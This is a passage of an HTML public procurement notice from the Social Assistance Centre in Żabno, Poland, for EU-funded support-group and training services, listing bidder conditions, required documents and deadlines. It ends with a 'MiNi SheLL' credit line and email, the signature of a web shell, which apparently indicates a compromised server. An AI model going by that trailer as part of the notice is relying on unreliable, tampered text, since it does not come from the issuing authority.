-prowadzenie dokumentacji, z odpowiednim oznakowaniem promocyjnym - logo POKL, lista obecności. Po zakończeniu zajęć przekazanie Zmawiającemu orginałów tych dokumentów wraz ze wzorem zaświadczenia potwierdzającego uczestnictwo w zajęciach grupy wsparcia,
-ubezpieczenie uczestników grupy wsparcia od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca zajęć,
-zapewnienie na zajęciach grupy wsparcia poczęstunku w formie ciastek, kawy, herbaty, soków, wody mineralnej - potwierdzenie korzystania z poczęstunku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się zamówienia uzupełniające tego samego rodzaju w wysokości do 20% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania ww warunków metodą spełnia /nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty,  tj :
a)oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - załącznik nr 2,
b)wpis do rejestru Marszałka Województwa w zakresie prowadzonej działalności gospodarczej dotyczącej świadczenia usług, pośrednictwa pracy, doradztwa personalnego, poradnictwa zawodowego i pracy tymczasowej,
c)zezwolenie - zaświadczenie o wpisie do rejestru Wojewódzkiego Urzędu Pracy - 
Firmy Szkoleniowe - akredytacja WUP
d)zaświadczenie o wpisie do rejestru organizatorów turystyki i pośredników 
turystycznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania ww warunków metodą spełnia /nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty,  tj :
a)oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - załącznik nr 2,
b)wykaz posiadanego doświadczenie zawodowego wyrażającego się wykonaniem 
przynajmniej trzech cykli szkoleniowego  na wyjeździe dla minimum 96 osób w 
jednym cyklu, w okresie ostatnich trzech lat, a jeśli okres prowadzenia działalności 
jest krótszy - w tym okresie w zakresie zbliżonym do przedmiotu zamówienia z 
potwierdzeniem, że usługa została wykonana należycie,  
c)wykaz posiadanego doświadczenie zawodowego wyrażającego się wykonaniem przynajmniej jednego cyklu szkoleniowego w miejscu i na wyjeździe w okresie ostatnich trzech lat, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie w zakresie zbliżonym do przedmiotu zamówienia z potwierdzeniem, że usługa została wykonana należycie, o wartości nie mniejszej niż 60 000,00 tys. zł</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania ww warunków metodą spełnia /nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty,  tj :
a)oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - załącznik nr 2,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania ww warunków metodą spełnia /nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty,  tj :
a)oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - załącznik nr 2,
b)wykaz osób uczestniczących w realizacji zamówienia (załącznik nr 5), tj. co najmniej : 
- dwie osoby posiadającą wykształcenie  wyższe, kierunek psychologia  z co najmniej 3 letnim doświadczeniem w zawodzie psychologa, która przeprowadziła co najmniej 3 
zajęcia (warsztaty) o tematyce odpowiadającej przedmiotowi zamówienia 
- 4 osobami posiadającymi wykształcenie pedagogiczne z co najmniej 2 krotnym 
doświadczeniem w zajmowaniu się grupą dzieci w wieku do 18 lat</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania ww warunków metodą spełnia /nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty,  tj :
a)oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - załącznik nr 2,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zabno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Żabnie ul. Św. Jana 3a 33-240 Żabno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2012 godzina 08:00, miejsce: Ośrodek Pomocy Społecznej w Żabnie ul. Św. Jana 3a 33-240 Żabno pokój 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowane ze środków Unii Europejskiej Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upwszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez Ośrodki Pomocy Społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com